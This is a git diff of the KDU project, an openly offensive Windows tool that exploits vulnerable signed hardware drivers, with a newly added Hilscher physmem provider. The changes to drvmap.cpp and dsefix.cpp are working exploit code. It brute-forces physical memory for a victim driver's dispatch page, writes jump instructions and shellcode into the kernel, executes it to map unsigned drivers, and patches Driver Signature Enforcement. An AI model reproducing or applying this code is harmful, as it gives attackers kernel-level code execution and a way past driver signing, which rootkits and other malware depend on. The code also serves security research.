bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj diff --git a/LICENSE.txt b/LICENSE.txt index 051953a..c719937 100644 --- a/LICENSE.txt +++ b/LICENSE.txt @@ -1,6 +1,6 @@ MIT License -Copyright (c) 2020 - 2022 KDU Project +Copyright (c) 2020 - 2023 KDU Project Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/README.md b/README.md index ea0bceb..9816d68 100644 --- a/README.md +++ b/README.md @@ -135,6 +135,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware | 28 | ASRock | AsrDrv106 | Phantom Gaming Tuning | RWEverything | 1.0.6 and below | | | 29 | Arthur Liberman| ALSysIO64 | Core Temp | Original | 2.0.11 and below | | | 30 | AMD | AMDRyzenMasterDriver | Multiple software packages | Original | 2.0.0.0 and below | | +| 31 | Hilscher | physmem | Physical Memory Viewer for Windows | Original | 1.0.0.0 | Cert, Name | ###### *At commit time, data maybe inaccurate. @@ -209,4 +210,4 @@ They are used in multiple products from hardware vendors mostly in unmodified st # Authors -(c) 2020 - 2022 KDU Project +(c) 2020 - 2023 KDU Project diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj index e815f36..52cc082 100644 --- a/Source/Hamakaze/KDU.vcxproj +++ b/Source/Hamakaze/KDU.vcxproj @@ -141,6 +141,7 @@ + @@ -188,6 +189,7 @@ + diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters index c69bb6f..9c8b647 100644 --- a/Source/Hamakaze/KDU.vcxproj.filters +++ b/Source/Hamakaze/KDU.vcxproj.filters @@ -183,6 +183,9 @@ Source Files\idrv + + Source Files\idrv + @@ -341,6 +344,9 @@ Source Files\idrv + + Source Files\idrv + diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user index c665ea0..e9f3ec8 100644 --- a/Source/Hamakaze/KDU.vcxproj.user +++ b/Source/Hamakaze/KDU.vcxproj.user @@ -1,11 +1,13 @@  - -prv 30 -map c:\install\dummy2.sys + + WindowsLocalDebugger - -prv 30 -map c:\install\dummy2.sys + + WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Hamakaze/drvmap.cpp b/Source/Hamakaze/drvmap.cpp index 0076a63..4cafb32 100644 --- a/Source/Hamakaze/drvmap.cpp +++ b/Source/Hamakaze/drvmap.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: DRVMAP.CPP * -* VERSION: 1.20 +* VERSION: 1.30 * -* DATE: 10 Feb 2022 +* DATE: 20 Mar 2023 * * Driver mapping routines. * @@ -447,7 +447,7 @@ PVOID KDUSetupShellCode( supPrintfEvent(kduEventError, "[!] Unexpected shellcode procedure size, abort\r\n"); - ScFree(pvShellCode); + ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL)); pvShellCode = NULL; break; } @@ -462,201 +462,248 @@ PVOID KDUSetupShellCode( } /* -* KDUCheckMemoryLayout +* KDUPagePatchCallback * * Purpose: * -* Check if shellcode can be placed within the same/next physical page(s). +* Patch dispatch pages in physical memory. * */ -BOOL KDUCheckMemoryLayout( - _In_ KDU_CONTEXT* Context, - _In_ ULONG_PTR TargetAddress -) +BOOL WINAPI KDUPagePatchCallback( + _In_ ULONG_PTR Address, + _In_ PVOID UserContext) { - ULONG dataSize; - ULONG_PTR memPage, physAddrStart, physAddrEnd; + BOOL bIoResult; + PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext; - KDU_PROVIDER* prov = Context->Provider; + provReadPhysicalMemory ReadPhysicalMemory = Params->ReadPhysicalMemory; + provWritePhysicalMemory WritePhysicalMemory = Params->WritePhysicalMemory; - // - // If provider does not support translation return TRUE. - // - if ((PVOID)prov->Callbacks.VirtualToPhysical == NULL) - return TRUE; + ULONG_PTR targetAddress = 0; - dataSize = ScSizeOf(Context->ShellVersion, NULL); + PVOID dispatchSignature = Params->DispatchSignature; + ULONG signatureSize = Params->DispatchSignatureLength; + ULONG dispatchPageOffset = Params->DispatchHandlerPageOffset; - memPage = (TargetAddress & 0xfffffffffffff000ull); + BYTE buffer[PAGE_SIZE]; + RtlSecureZeroMemory(&buffer, sizeof(buffer)); - if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle, - memPage, - &physAddrStart)) + if (ReadPhysicalMemory(Params->DeviceHandle, + Address, + &buffer, + PAGE_SIZE)) { - memPage = (TargetAddress + dataSize) & 0xfffffffffffff000ull; - - if (prov->Callbacks.VirtualToPhysical(Context->DeviceHandle, - memPage, - &physAddrEnd)) + if (signatureSize == RtlCompareMemory(dispatchSignature, + RtlOffsetToPointer(buffer, dispatchPageOffset), + signatureSize)) { - ULONG_PTR diffAddr = physAddrEnd - physAddrStart; + printf_s("\t-> Found page with code at address 0x%llX\r\n", Address); + Params->ccPagesFound += 1; - if (diffAddr > PAGE_SIZE) - return FALSE; - else - return TRUE; - } + if ((SIZE_T)dispatchPageOffset + (SIZE_T)Params->cbPayload > PAGE_SIZE) { + + unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 }; + + *(PULONG)&jmpcode[1] = Params->JmpAddress; + + printf_s("\t--> Setting jump[%lX][%lX] at address 0x%llX\r\n", + jmpcode[0], + *(PULONG)&jmpcode[1], + Address + dispatchPageOffset); + + bIoResult = WritePhysicalMemory(Params->DeviceHandle, + Address + dispatchPageOffset, + jmpcode, + sizeof(jmpcode)); + + if (bIoResult) { + + printf_s("\t--> Memory has been modified at address 0x%llX\r\n", Address + dispatchPageOffset); + printf_s("\t--> Overwriting page at address 0x%llX\r\n", Address); + + targetAddress = Address; + + bIoResult = WritePhysicalMemory(Params->DeviceHandle, + targetAddress, + Params->pvPayload, + Params->cbPayload); + + } + + } + else { + + targetAddress = Address + dispatchPageOffset; + + bIoResult = WritePhysicalMemory(Params->DeviceHandle, + targetAddress, + Params->pvPayload, + Params->cbPayload); + + } + + if (bIoResult) { + Params->ccPagesModified += 1; + printf_s("\t--> Memory has been modified at address 0x%llX\r\n", targetAddress); + } + else { + supPrintfEvent(kduEventError, + "Could not modify memory at address 0x%llX\r\n", targetAddress); + } + } } + return FALSE; } /* -* KDUMapDriver +* KDUDriverMapInit * * Purpose: * -* Run mapper. +* Allocate shellcode structure and create sync event. * */ -BOOL KDUMapDriver( +BOOL KDUDriverMapInit( _In_ PKDU_CONTEXT Context, - _In_ PVOID ImageBase) + _In_ PVOID ImageBase, + _Out_ PVOID* ShellCode, + _Out_ PHANDLE SectionHandle, + _Out_ PHANDLE SyncEventHandle +) { - BOOL bSuccess = FALSE; - ULONG_PTR objectAddress, targetAddress = 0; - FILE_OBJECT fileObject; - DEVICE_OBJECT deviceObject; - DRIVER_OBJECT driverObject; - PVOID pvShellCode; + HANDLE sectionHandle = NULL, readyEventHandle; - KDU_PROVIDER* prov; - KDU_VICTIM_PROVIDER* victimProv; - - ULONG retryCount = 1, maxRetry = 3; - - HANDLE victimDeviceHandle = NULL; - - FUNCTION_ENTER_MSG(__FUNCTION__); - - prov = Context->Provider; - victimProv = Context->Victim; - -Reload: + *ShellCode = NULL; + *SectionHandle = NULL; + *SyncEventHandle = NULL; - if (victimProv->SupportReload == FALSE) { - printf_s("[+] Victim does not supports reload, max retry count set to 1\r\n"); - maxRetry = 1; - } + pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle); + if (pvShellCode == NULL) { - printf_s("[+] Victim \"%ws\" %lu acquire attempt of %lu (max)\r\n", victimProv->Name, retryCount, maxRetry); + supPrintfEvent(kduEventError, + "[!] Error while building shellcode, abort\r\n"); - // - // If this is reload, release victim. - // - if (victimDeviceHandle) { - VpRelease(victimProv, &victimDeviceHandle); + return FALSE; } - if (VpCreate(victimProv, - Context->ModuleBase, - &victimDeviceHandle)) - { - printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle); - } - else { + readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode); + if (readyEventHandle == NULL) { supPrintfEvent(kduEventError, - "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError()); - - } - - if (supQueryObjectFromHandle(victimDeviceHandle, &objectAddress)) { + "[!] Error building the ready event handle, abort\r\n"); - do { + ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL)); - RtlSecureZeroMemory(&fileObject, sizeof(fileObject)); + return FALSE; + } - printf_s("[+] Reading FILE_OBJECT at 0x%llX\r\n", objectAddress); + *ShellCode = pvShellCode; + *SectionHandle = sectionHandle; + *SyncEventHandle = readyEventHandle; - if (!KDUReadKernelVM(Context, - objectAddress, - &fileObject, - sizeof(FILE_OBJECT))) - { + return TRUE; +} - supPrintfEvent(kduEventError, - "[!] Could not read FILE_OBJECT at 0x%llX\r\n", objectAddress); +/* +* KDUpMapDriverPhysicalSection +* +* Purpose: +* +* Process shellcode write through physical memory section. +* +*/ +BOOL KDUpMapDriverPhysicalSection( + _In_ PKDU_CONTEXT Context, + _In_ PVOID ScBuffer, + _In_ ULONG ScSize, + _In_ HANDLE ScSectionHandle, + _In_ HANDLE ReadyEventHandle, + _In_ PVICTIM_IMAGE_INFORMATION VictimImageInformation, + _In_ ULONG_PTR TargetAddress +) +{ + BOOL bSuccess = FALSE; + HANDLE deviceHandle = Context->DeviceHandle; + HANDLE victimDeviceHandle = NULL; + KDU_PROVIDER* prov = Context->Provider; + KDU_VICTIM_PROVIDER* victimProv = Context->Victim; - break; - } + ULONG dispatchPageOffset = VictimImageInformation->DispatchPageOffset; + ULONG_PTR memPage, targetAddress = TargetAddress; - printf_s("[+] Reading DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject); + provWriteKernelVM WriteKernelVM = prov->Callbacks.WriteKernelVM; - RtlSecureZeroMemory(&deviceObject, sizeof(deviceObject)); + do { - if (!KDUReadKernelVM(Context, - (ULONG_PTR)fileObject.DeviceObject, - &deviceObject, - sizeof(DEVICE_OBJECT))) - { + if ((SIZE_T)dispatchPageOffset + (SIZE_T)ScSize > PAGE_SIZE) { - supPrintfEvent(kduEventError, - "[!] Could not read DEVICE_OBJECT at 0x%p\r\n", fileObject.DeviceObject); + memPage = (TargetAddress & 0xfffffffffffff000ull); + printf_s("[~] Shellcode overlaps page boundary, switching target memory address to 0x%llX\r\n", memPage); - break; - } + unsigned char jmpcode[] = { 0xe9, 0x0, 0x0, 0x0, 0x0 }; - printf_s("[+] Reading DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject); + *(PULONG)&jmpcode[1] = VictimImageInformation->JumpValue; - RtlSecureZeroMemory(&driverObject, sizeof(driverObject)); + printf_s("\t>> Setting jump[%lX][%lX] at address 0x%llX\r\n", + jmpcode[0], + *(PULONG)&jmpcode[1], + TargetAddress); - if (!KDUReadKernelVM(Context, - (ULONG_PTR)deviceObject.DriverObject, - &driverObject, - sizeof(DRIVER_OBJECT))) - { + if (!WriteKernelVM(deviceHandle, TargetAddress, &jmpcode, sizeof(jmpcode))) { supPrintfEvent(kduEventError, - "[!] Could not read DRIVER_OBJECT at 0x%p\r\n", deviceObject.DriverObject); + "[!] Error writting kernel memory, abort\r\n"); break; + } + else { - // - // Victim handle no longer needed, can be closed. - // - NtClose(victimDeviceHandle); - victimDeviceHandle = NULL; + targetAddress = TargetAddress - dispatchPageOffset; - targetAddress = (ULONG_PTR)driverObject.MajorFunction[IRP_MJ_DEVICE_CONTROL]; + } - if (!KDUCheckMemoryLayout(Context, targetAddress)) { + } - supPrintfEvent(kduEventError, - "[!] Physical address is not within same/next page, reload victim driver\r\n"); + // + // Write shellcode to kernel. + // + printf_s("[+] Writing shellcode at 0x%llX address with size 0x%lX\r\n", targetAddress, ScSize); - retryCount += 1; - if (retryCount > maxRetry) { + if (!WriteKernelVM(deviceHandle, targetAddress, ScBuffer, ScSize)) { - supPrintfEvent(kduEventError, - "[!] Too many attempts, abort\r\n"); + supPrintfEvent(kduEventError, + "[!] Error writting kernel memory, abort\r\n"); + break; + } - break; - } - goto Reload; + // + // Execute shellcode. + // + printf_s("[+] Executing shellcode\r\n"); + VpExecutePayload(victimProv, &victimDeviceHandle); - } + // + // Wait for the shellcode to trigger the event + // + if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) { - printf_s("[+] Victim IRP_MJ_DEVICE_CONTROL 0x%llX\r\n", targetAddress); - printf_s("[+] Victim DriverUnload 0x%p\r\n", driverObject.DriverUnload); + supPrintfEvent(kduEventError, + "[!] Shellcode did not trigger the event within two seconds.\r\n"); - bSuccess = TRUE; + bSuccess = FALSE; + } + else + { + KDUShowPayloadResult(Context, ScSectionHandle); + } - } while (FALSE); + bSuccess = TRUE; - } + } while (FALSE); // // Ensure victim handle is closed. @@ -666,293 +713,347 @@ BOOL KDUMapDriver( victimDeviceHandle = NULL; } - if (bSuccess) { - - HANDLE sectionHandle = NULL; - - pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle); - - if (pvShellCode) { - - HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode); - if (readyEventHandle) { - - // - // Write shellcode to driver. - // - if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle, - targetAddress, - pvShellCode, - ScSizeOf(Context->ShellVersion, NULL))) - { - - supPrintfEvent(kduEventError, - "[!] Error writing shellcode to the target driver, abort\r\n"); - - bSuccess = FALSE; - } - else { - - printf_s("[+] Driver IRP_MJ_DEVICE_CONTROL handler code modified\r\n"); - - // - // Run shellcode. - // - printf_s("[+] Run shellcode\r\n"); - VpExecutePayload(victimProv, &victimDeviceHandle); - - // - // Wait for the shellcode to trigger the event - // - if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) { - - supPrintfEvent(kduEventError, - "[!] Shellcode did not trigger the event within two seconds.\r\n"); - - bSuccess = FALSE; - } - else - { - KDUShowPayloadResult(Context, sectionHandle); - } - } + return bSuccess; +} - CloseHandle(readyEventHandle); +/* +* KDUpMapDriverPhysicalBruteForce +* +* Purpose: +* +* Process shellcode write through physical memory bruteforce. +* +*/ +BOOL KDUpMapDriverPhysicalBruteForce( + _In_ PKDU_CONTEXT Context, + _In_ PVOID ScBuffer, + _In_ ULONG ScSize, + _In_ HANDLE ScSectionHandle, + _In_ HANDLE ReadyEventHandle, + _In_ PKDU_PHYSMEM_ENUM_PARAMS EnumParams +) +{ + BOOL bSuccess = FALSE; + KDU_VICTIM_PROVIDER* victimProv = Context->Victim; + HANDLE victimDeviceHandle = NULL; - } //readyEventHandle - else { + EnumParams->bWrite = TRUE; + EnumParams->ccPagesFound = 0; + EnumParams->ccPagesModified = 0; + EnumParams->pvPayload = ScBuffer; + EnumParams->cbPayload = ScSize; - supPrintfEvent(kduEventError, - "[!] Error building the ready event handle, abort\r\n"); + supPrintfEvent(kduEventInformation, + "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name); - bSuccess = FALSE; - } + if (supEnumeratePhysicalMemory(KDUPagePatchCallback, EnumParams)) { - if (sectionHandle) { - NtClose(sectionHandle); - } + printf_s("[+] Number of pages found: %llu, modified: %llu\r\n", + EnumParams->ccPagesFound, + EnumParams->ccPagesModified); - } //pvShellCode + // + // Execute shellcode. + // + printf_s("[+] Executing shellcode\r\n"); + VpExecutePayload(victimProv, &victimDeviceHandle); - else { + // + // Wait for the shellcode to trigger the event + // + if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) { supPrintfEvent(kduEventError, - "[!] Error while building shellcode, abort\r\n"); + "[!] Shellcode did not trigger the event within two seconds.\r\n"); bSuccess = FALSE; } + else + { + KDUShowPayloadResult(Context, ScSectionHandle); + } - } //bSuccess + } else { - supPrintfEvent(kduEventError, - "[!] Error preloading victim driver, abort\r\n"); + "[!] Failed to enumerate physical memory.\r\n"); bSuccess = FALSE; } // - // Cleanup. + // Ensure victim handle is closed. // - if (VpRelease(victimProv, &victimDeviceHandle)) { - printf_s("[+] Victim released\r\n"); + if (victimDeviceHandle) { + NtClose(victimDeviceHandle); + victimDeviceHandle = NULL; } - FUNCTION_LEAVE_MSG(__FUNCTION__); - return bSuccess; } /* -* KDUProcExpPagePatchCallback +* KDUpMapDriverDirectVM * * Purpose: * -* Patch ProcExp dispatch pages in physical memory. +* Process shellcode write through direct virtual memory write primitive. * */ -BOOL WINAPI KDUProcExpPagePatchCallback( - _In_ ULONG_PTR Address, - _In_ PVOID UserContext) +BOOL KDUpMapDriverDirectVM( + _In_ PKDU_CONTEXT Context, + _In_ PVOID ScBuffer, + _In_ ULONG ScSize, + _In_ HANDLE ScSectionHandle, + _In_ HANDLE ReadyEventHandle, + _In_ ULONG_PTR TargetAddress +) { - PKDU_PHYSMEM_ENUM_PARAMS Params = (PKDU_PHYSMEM_ENUM_PARAMS)UserContext; - PKDU_CONTEXT Context = Params->Context; + BOOL bSuccess = FALSE; + KDU_PROVIDER* prov = Context->Provider; + KDU_VICTIM_PROVIDER* victimProv = Context->Victim; + HANDLE victimDeviceHandle = NULL; - provReadPhysicalMemory ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; - provWritePhysicalMemory WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; + // + // Write shellcode to driver. + // + if (!prov->Callbacks.WriteKernelVM(Context->DeviceHandle, + TargetAddress, + ScBuffer, + ScSize)) + { - ULONG signatureSize = sizeof(ProcExpSignature); + supPrintfEvent(kduEventError, + "[!] Error writing shellcode to the target driver, abort\r\n"); - BYTE buffer[PAGE_SIZE]; - RtlSecureZeroMemory(&buffer, sizeof(buffer)); + bSuccess = FALSE; + } + else { - if (ReadPhysicalMemory(Context->DeviceHandle, - Address, - &buffer, - PAGE_SIZE)) - { - if (signatureSize == RtlCompareMemory(ProcExpSignature, - RtlOffsetToPointer(buffer, PE152_DISPATCH_PAGE_OFFSET), - signatureSize)) - { - printf_s("\tFound page with code at address 0x%llX\r\n", Address); - Params->ccPagesFound += 1; + printf_s("[+] Driver handler code modified\r\n"); - if (WritePhysicalMemory(Context->DeviceHandle, - Address + PE152_DISPATCH_PAGE_OFFSET, - Params->pvPayload, - Params->cbPayload)) - { - Params->ccPagesModified += 1; - printf_s("\tMemory has been modified at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET); - } - else { - supPrintfEvent(kduEventError, - "Could not modify memory at address 0x%llX\r\n", Address + PE152_DISPATCH_PAGE_OFFSET); - } + // + // Execute shellcode. + // + printf_s("[+] Executing shellcode\r\n"); + VpExecutePayload(victimProv, &victimDeviceHandle); + + // + // Wait for the shellcode to trigger the event + // + if (WaitForSingleObject(ReadyEventHandle, 2000) != WAIT_OBJECT_0) { + supPrintfEvent(kduEventError, + "[!] Shellcode did not trigger the event within two seconds.\r\n"); + + bSuccess = FALSE; + } + else + { + KDUShowPayloadResult(Context, ScSectionHandle); } } - return FALSE; + // + // Ensure victim handle is closed. + // + if (victimDeviceHandle) { + NtClose(victimDeviceHandle); + victimDeviceHandle = NULL; + } + + return bSuccess; } /* -* KDUMapDriver2 +* KDUMapDriver * * Purpose: * -* Run mapper, using physical memory mapping. +* Run mapper. * */ -BOOL KDUMapDriver2( +BOOL KDUMapDriver( _In_ PKDU_CONTEXT Context, _In_ PVOID ImageBase) { BOOL bSuccess = FALSE; - KDU_PROVIDER* prov; + ULONG_PTR targetAddress = 0; + PVOID pvShellCode = NULL; + KDU_VICTIM_PROVIDER* victimProv; - HANDLE victimDeviceHandle = NULL; - PVOID pvShellCode; + VICTIM_IMAGE_INFORMATION vi; + VICTIM_DRIVER_INFORMATION vdi; KDU_PHYSMEM_ENUM_PARAMS enumParams; + VICTIM_LOAD_PARAMETERS viLoadParams; + + ULONG dispatchOffset = 0; FUNCTION_ENTER_MSG(__FUNCTION__); - prov = Context->Provider; victimProv = Context->Victim; - // - // Load/open victim. - // - if (VpCreate(victimProv, - Context->ModuleBase, - &victimDeviceHandle)) - { - printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle); - } - else { - - supPrintfEvent(kduEventError, - "[!] Error preloading victim driver, abort\r\n"); + do { - return FALSE; - } + viLoadParams.Provider = victimProv; - HANDLE sectionHandle = NULL; + // + // Load victim driver. + // + if (VpCreate(victimProv, + Context->ModuleBase, + NULL, + VpLoadDriverCallback, + &viLoadParams)) + { + printf_s("[+] Successfully loaded victim driver\r\n"); + } + else { - pvShellCode = KDUSetupShellCode(Context, ImageBase, §ionHandle); + supPrintfEvent(kduEventError, + "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError()); - if (pvShellCode) { + break; - HANDLE readyEventHandle = ScCreateReadyEvent(Context->ShellVersion, pvShellCode); - if (readyEventHandle) { + } - enumParams.bWrite = TRUE; - enumParams.ccPagesFound = 0; - enumParams.ccPagesModified = 0; - enumParams.Context = Context; - enumParams.pvPayload = pvShellCode; - enumParams.cbPayload = ScSizeOf(Context->ShellVersion, NULL); + // + // Query all required victim information. + // + RtlSecureZeroMemory(&vi, sizeof(vi)); - supPrintfEvent(kduEventInformation, - "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name); + printf_s("[+] Query victim image information\r\n"); - if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) { + if (VpQueryInformation( + Context->Victim, + VictimImageInformation, + &vi, + sizeof(vi))) + { + dispatchOffset = vi.DispatchOffset; - printf_s("[+] Number of pages found: %llu, modified: %llu\r\n", - enumParams.ccPagesFound, - enumParams.ccPagesModified); + RtlSecureZeroMemory(&vdi, sizeof(vdi)); - // - // Run shellcode. - // - printf_s("[+] Run shellcode\r\n"); - VpExecutePayload(victimProv, &victimDeviceHandle); + printf_s("[+] Query victim loaded driver layout\r\n"); - // - // Wait for the shellcode to trigger the event - // - if (WaitForSingleObject(readyEventHandle, 2000) != WAIT_OBJECT_0) { + bSuccess = VpQueryInformation( + Context->Victim, + VictimDriverInformation, + &vdi, + sizeof(vdi)); - supPrintfEvent(kduEventError, - "[!] Shellcode did not trigger the event within two seconds.\r\n"); + if (bSuccess) + { - bSuccess = FALSE; - } - else - { - KDUShowPayloadResult(Context, sectionHandle); - } + targetAddress = vdi.LoadedImageBase + dispatchOffset; } else { + supPrintfEvent(kduEventError, - "[!] Failed to enumerate physical memory.\r\n"); + "[!] Could not query victim driver layout, GetLastError %lu\r\n", GetLastError()); - bSuccess = FALSE; + break; } - CloseHandle(readyEventHandle); - - } //readyEventHandle - else { - + } + else + { supPrintfEvent(kduEventError, - "[!] Error building the ready event handle, abort\r\n"); + "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError()); - bSuccess = FALSE; + break; } - if (sectionHandle) { - NtClose(sectionHandle); + printf_s("[+] Victim target address 0x%llX\r\n", targetAddress); + + HANDLE sectionHandle = NULL, readyEventHandle = NULL; + + // + // Prepare shellcode, signal event and shared section. + // + if (!KDUDriverMapInit(Context, + ImageBase, + &pvShellCode, + §ionHandle, + &readyEventHandle)) + { + break; } - } //pvShellCode + ULONG cbShellCode = ScSizeOf(Context->ShellVersion, NULL); - else { + // + // Select proper handling depending on exploitable driver type. + // + if (Context->Provider->LoadData->PhysMemoryBruteForce) { - supPrintfEvent(kduEventError, - "[!] Error while building shellcode, abort\r\n"); + // + // 1. Physical memory mapping via MmMapIoSpace(Ex) + // + RtlSecureZeroMemory(&enumParams, sizeof(enumParams)); - bSuccess = FALSE; - } + enumParams.DeviceHandle = Context->DeviceHandle; + enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; + enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; - // - // Ensure victim handle is closed. - // - if (victimDeviceHandle) { - NtClose(victimDeviceHandle); - victimDeviceHandle = NULL; - } + enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature; + enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength; + + enumParams.DispatchHandlerOffset = vi.DispatchOffset; + enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset; + enumParams.JmpAddress = vi.JumpValue; + + bSuccess = KDUpMapDriverPhysicalBruteForce(Context, + pvShellCode, + cbShellCode, + sectionHandle, + readyEventHandle, + &enumParams); + } + else + if (Context->Provider->LoadData->PML4FromLowStub || Context->Provider->LoadData->PreferPhysical) { + // + // 2. Physical section access type driver with virt2phys translation available. + // + bSuccess = KDUpMapDriverPhysicalSection(Context, + pvShellCode, + cbShellCode, + sectionHandle, + readyEventHandle, + &vi, + targetAddress); + + } + else { + // + // 3. Direct VM write primitive available. + // + bSuccess = KDUpMapDriverDirectVM(Context, + pvShellCode, + cbShellCode, + sectionHandle, + readyEventHandle, + targetAddress); + + } + + if (readyEventHandle) CloseHandle(readyEventHandle); + if (sectionHandle) NtClose(sectionHandle); + + } while (FALSE); // // Cleanup. // - if (VpRelease(victimProv, &victimDeviceHandle)) { + if (VpRelease(victimProv, NULL)) { printf_s("[+] Victim released\r\n"); } + if (pvShellCode) + ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL)); + FUNCTION_LEAVE_MSG(__FUNCTION__); return bSuccess; diff --git a/Source/Hamakaze/drvmap.h b/Source/Hamakaze/drvmap.h index 4263525..030f827 100644 --- a/Source/Hamakaze/drvmap.h +++ b/Source/Hamakaze/drvmap.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2020 - 2022 +* (C) COPYRIGHT AUTHORS, 2020 - 2023 * * TITLE: DRVMAP.H * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * Prototypes and definitions for driver mapping. * @@ -23,10 +23,6 @@ PVOID KDUSetupShellCode( _In_ PVOID ImageBase, _Out_ PHANDLE SectionHandle); -BOOL WINAPI KDUProcExpPagePatchCallback( - _In_ ULONG_PTR Address, - _In_ PVOID UserContext); - VOID KDUShowPayloadResult( _In_ PKDU_CONTEXT Context, _In_ HANDLE SectionHandle); @@ -35,6 +31,6 @@ BOOL KDUMapDriver( _In_ PKDU_CONTEXT Context, _In_ PVOID ImageBase); -BOOL KDUMapDriver2( - _In_ PKDU_CONTEXT Context, - _In_ PVOID ImageBase); +BOOL WINAPI KDUPagePatchCallback( + _In_ ULONG_PTR Address, + _In_ PVOID UserContext); diff --git a/Source/Hamakaze/dsefix.cpp b/Source/Hamakaze/dsefix.cpp index c486031..e099288 100644 --- a/Source/Hamakaze/dsefix.cpp +++ b/Source/Hamakaze/dsefix.cpp @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2022 +* (C) COPYRIGHT AUTHORS, 2014 - 2023 * * TITLE: DSEFIX.CPP * -* VERSION: 1.28 +* VERSION: 1.30 * -* DATE: 01 Dec 2022 +* DATE: 20 Mar 2023 * * CI DSE corruption related routines. * Based on DSEFix v1.3 @@ -439,6 +439,7 @@ BOOL KDUControlDSE2( HANDLE victimDeviceHandle = NULL; KDU_PHYSMEM_ENUM_PARAMS enumParams; + VICTIM_IMAGE_INFORMATION vi; prov = Context->Provider; victimProv = Context->Victim; @@ -462,7 +463,9 @@ BOOL KDUControlDSE2( // if (VpCreate(victimProv, Context->ModuleBase, - &victimDeviceHandle)) + &victimDeviceHandle, + NULL, + NULL)) { printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle); } @@ -478,29 +481,51 @@ BOOL KDUControlDSE2( (PVOID)Address, DSEValue); - enumParams.bWrite = TRUE; - enumParams.ccPagesFound = 0; - enumParams.ccPagesModified = 0; - enumParams.Context = Context; - enumParams.pvPayload = shellBuffer; - enumParams.cbPayload = (ULONG)shellSize; + RtlSecureZeroMemory(&vi, sizeof(vi)); - supPrintfEvent(kduEventInformation, - "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name); + if (!VpQueryInformation( + Context->Victim, VictimImageInformation, &vi, sizeof(vi))) + { + supPrintfEvent(kduEventError, + "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError()); + + } + else { - if (supEnumeratePhysicalMemory(KDUProcExpPagePatchCallback, &enumParams)) { + enumParams.DispatchHandlerOffset = vi.DispatchOffset; + enumParams.DispatchHandlerPageOffset = vi.DispatchPageOffset; + enumParams.JmpAddress = vi.JumpValue; + enumParams.DeviceHandle = Context->DeviceHandle; + enumParams.ReadPhysicalMemory = Context->Provider->Callbacks.ReadPhysicalMemory; + enumParams.WritePhysicalMemory = Context->Provider->Callbacks.WritePhysicalMemory; - printf_s("[+] Number of pages found: %llu, modified: %llu\r\n", - enumParams.ccPagesFound, - enumParams.ccPagesModified); + enumParams.DispatchSignature = Context->Victim->Data.DispatchSignature; + enumParams.DispatchSignatureLength = Context->Victim->Data.DispatchSignatureLength; - // - // Run shellcode. - // - VpExecutePayload(victimProv, &victimDeviceHandle); + enumParams.bWrite = TRUE; + enumParams.ccPagesFound = 0; + enumParams.ccPagesModified = 0; + enumParams.pvPayload = shellBuffer; + enumParams.cbPayload = (ULONG)shellSize; supPrintfEvent(kduEventInformation, - "[+] DSE patch executed successfully\r\n"); + "[+] Looking for %ws driver dispatch memory pages, please wait\r\n", victimProv->Name); + + if (supEnumeratePhysicalMemory(KDUPagePatchCallback, &enumParams)) { 